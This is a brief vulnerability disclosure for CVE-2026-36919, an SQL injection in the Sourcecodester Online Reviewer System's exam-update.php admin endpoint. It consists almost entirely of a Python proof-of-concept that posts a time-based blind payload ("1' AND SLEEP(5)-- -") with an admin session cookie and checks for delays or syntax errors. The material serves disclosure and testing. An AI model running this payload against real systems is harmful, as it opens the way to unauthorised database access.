CVE-2026-36919: Sourcecodester Online Reviewer System SQL注入漏洞

# PoC for CVE-2026-36919 # This script demonstrates the SQL Injection vulnerability import requests target_url = "http://target-ip/system/system/admins/assessments/examproper/exam-update.php" # Administrator session cookie is required (PR:H) cookies = { "PHPSESSID": "valid_admin_session_id_here" } # Injection payload testing for syntax error or time-based blind payload = { "id": "1' AND SLEEP(5)-- -", # Time-based payload example "submit": "update" } try: response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed (Time-based)") elif "syntax error" in response.text: print("[+] Vulnerability confirmed (Error-based)") else: print("[-] Vulnerability could not be confirmed") except Exception as e: print(f"[!] Error: {e}")